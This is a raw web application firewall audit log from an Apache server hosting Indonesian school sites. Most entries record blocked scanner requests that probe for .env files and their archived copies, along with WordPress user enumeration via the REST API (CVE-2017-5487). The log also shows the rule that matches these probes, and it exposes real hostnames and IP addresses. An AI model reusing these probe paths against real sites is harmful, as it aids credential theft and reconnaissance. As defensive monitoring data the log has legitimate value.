userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597958176905 4574 (- - -) Stopwatch2: 1746597958176905 4574; combined=2707, p1=586, p2=2021, p3=37, p4=34, p5=29, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ddff959-Z-- --2652b62f-A-- [07/May/2025:13:06:00 +0700] aBr4SEkjCPYF0_E6F_IngQAAAIk 103.236.140.4 33784 103.236.140.4 8181 --2652b62f-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --2652b62f-C-- ¶ÿexamplecom --2652b62f-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --2652b62f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597960690438 4470 (- - -) Stopwatch2: 1746597960690438 4470; combined=2554, p1=524, p2=1926, p3=35, p4=35, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2652b62f-Z-- --0eaa6977-A-- [07/May/2025:13:25:40 +0700] aBr85EkjCPYF0_E6F_IqTQAAAIo 103.236.140.4 48774 103.236.140.4 8181 --0eaa6977-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 170.82.182.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 170.82.182.71 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0eaa6977-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0eaa6977-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746599140388023 3173 (- - -) Stopwatch2: 1746599140388023 3173; combined=1417, p1=520, p2=868, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0eaa6977-Z-- --ec9ecf11-A-- [07/May/2025:14:40:54 +0700] aBsOhm3ZWOH0zu5xiSSfSAAAAMo 103.236.140.4 33396 103.236.140.4 8181 --ec9ecf11-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) --ec9ecf11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec9ecf11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746603654168875 1633 (- - -) Stopwatch2: 1746603654168875 1633; combined=333, p1=298, p2=0, p3=0, p4=0, p5=35, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec9ecf11-Z-- --050b4817-A-- [07/May/2025:14:41:02 +0700] aBsOjoyiPdJj1JUH57qDWQAAABU 103.236.140.4 33412 103.236.140.4 8181 --050b4817-B-- GET /backend/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C) --050b4817-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --050b4817-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746603662702301 825 (- - -) Stopwatch2: 1746603662702301 825; combined=312, p1=276, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --050b4817-Z-- --19bcc849-A-- [07/May/2025:14:41:03 +0700] aBsOj4yiPdJj1JUH57qDWgAAAAI 103.236.140.4 33414 103.236.140.4 8181 --19bcc849-B-- GET /api/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3,gzip(gfe) --19bcc849-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19bcc849-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746603663703930 855 (- - -) Stopwatch2: 1746603663703930 855; combined=320, p1=285, p2=0, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19bcc849-Z-- --766a3e42-A-- [07/May/2025:14:41:05 +0700] aBsOkW3ZWOH0zu5xiSSfSwAAANM 103.236.140.4 33416 103.236.140.4 8181 --766a3e42-B-- GET /admin/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; KTXN) --766a3e42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --766a3e42-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746603665900810 676 (- - -) Stopwatch2: 1746603665900810 676; combined=257, p1=221, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --766a3e42-Z-- --8fefbc24-A-- [07/May/2025:14:52:57 +0700] aBsRWW3ZWOH0zu5xiSSfdwAAANA 103.236.140.4 33762 103.236.140.4 8181 --8fefbc24-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 188.164.223.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 188.164.223.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8fefbc24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fefbc24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746604377365060 2184 (- - -) Stopwatch2: 1746604377365060 2184; combined=1070, p1=367, p2=677, p3=0, p4=0, p5=26, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fefbc24-Z-- --a5e28164-A-- [07/May/2025:15:06:07 +0700] aBsUb23ZWOH0zu5xiSSfsAAAANg 103.236.140.4 34852 103.236.140.4 8181 --a5e28164-B-- GET /.env.zip HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140932986 --a5e28164-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a5e28164-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605167662936 723 (- - -) Stopwatch2: 1746605167662936 723; combined=253, p1=220, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5e28164-Z-- --6da92b31-A-- [07/May/2025:15:06:07 +0700] aBsUb0kjCPYF0_E6F_ItswAAAJA 103.236.140.4 34944 103.236.140.4 8181 --6da92b31-B-- GET /.env.zip HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855485 --6da92b31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6da92b31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605167697735 775 (- - -) Stopwatch2: 1746605167697735 775; combined=271, p1=235, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6da92b31-Z-- --6d9c0501-A-- [07/May/2025:15:06:07 +0700] aBsUb23ZWOH0zu5xiSSfsQAAAMk 103.236.140.4 34948 103.236.140.4 8181 --6d9c0501-B-- GET /.env.zip HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140932989 --6d9c0501-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6d9c0501-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605167772287 710 (- - -) Stopwatch2: 1746605167772287 710; combined=258, p1=226, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d9c0501-Z-- --2e65240d-A-- [07/May/2025:15:06:07 +0700] aBsUb12wLCWKKTe5QCHHFwAAAFE 103.236.140.4 34952 103.236.140.4 8181 --2e65240d-B-- GET /.env.zip HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855488 --2e65240d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2e65240d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605167857439 709 (- - -) Stopwatch2: 1746605167857439 709; combined=276, p1=240, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e65240d-Z-- --862edd3f-A-- [07/May/2025:15:06:07 +0700] aBsUb0kjCPYF0_E6F_IttAAAAJE 103.236.140.4 34956 103.236.140.4 8181 --862edd3f-B-- GET /.env.rar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140932992 --862edd3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --862edd3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605167893635 678 (- - -) Stopwatch2: 1746605167893635 678; combined=261, p1=228, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --862edd3f-Z-- --86b9b815-A-- [07/May/2025:15:06:07 +0700] aBsUb12wLCWKKTe5QCHHGAAAAEw 103.236.140.4 34960 103.236.140.4 8181 --86b9b815-B-- GET /.env.rar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855491 --86b9b815-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --86b9b815-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605167928069 683 (- - -) Stopwatch2: 1746605167928069 683; combined=274, p1=242, p2=0, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86b9b815-Z-- --48936605-A-- [07/May/2025:15:06:08 +0700] aBsUcF2wLCWKKTe5QCHHGQAAAEY 103.236.140.4 34964 103.236.140.4 8181 --48936605-B-- GET /.env.rar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140932995 --48936605-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --48936605-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168000941 656 (- - -) Stopwatch2: 1746605168000941 656; combined=251, p1=218, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48936605-Z-- --98e4c179-A-- [07/May/2025:15:06:08 +0700] aBsUcF2wLCWKKTe5QCHHGgAAAE8 103.236.140.4 34968 103.236.140.4 8181 --98e4c179-B-- GET /.env.rar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855494 --98e4c179-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --98e4c179-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168075341 708 (- - -) Stopwatch2: 1746605168075341 708; combined=262, p1=229, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98e4c179-Z-- --80e39311-A-- [07/May/2025:15:06:08 +0700] aBsUcF2wLCWKKTe5QCHHHAAAAFY 103.236.140.4 34974 103.236.140.4 8181 --80e39311-B-- GET /.env.tar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140932998 --80e39311-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --80e39311-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168110812 719 (- - -) Stopwatch2: 1746605168110812 719; combined=288, p1=238, p2=0, p3=0, p4=0, p5=50, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80e39311-Z-- --15791d10-A-- [07/May/2025:15:06:08 +0700] aBsUcF2wLCWKKTe5QCHHHQAAAE4 103.236.140.4 34978 103.236.140.4 8181 --15791d10-B-- GET /.env.tar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855497 --15791d10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --15791d10-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168145554 723 (- - -) Stopwatch2: 1746605168145554 723; combined=263, p1=226, p2=0, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15791d10-Z-- --1748e028-A-- [07/May/2025:15:06:08 +0700] aBsUcG3ZWOH0zu5xiSSfsgAAAMc 103.236.140.4 34982 103.236.140.4 8181 --1748e028-B-- GET /.env.tar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140933001 --1748e028-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1748e028-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168217855 726 (- - -) Stopwatch2: 1746605168217855 726; combined=269, p1=236, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 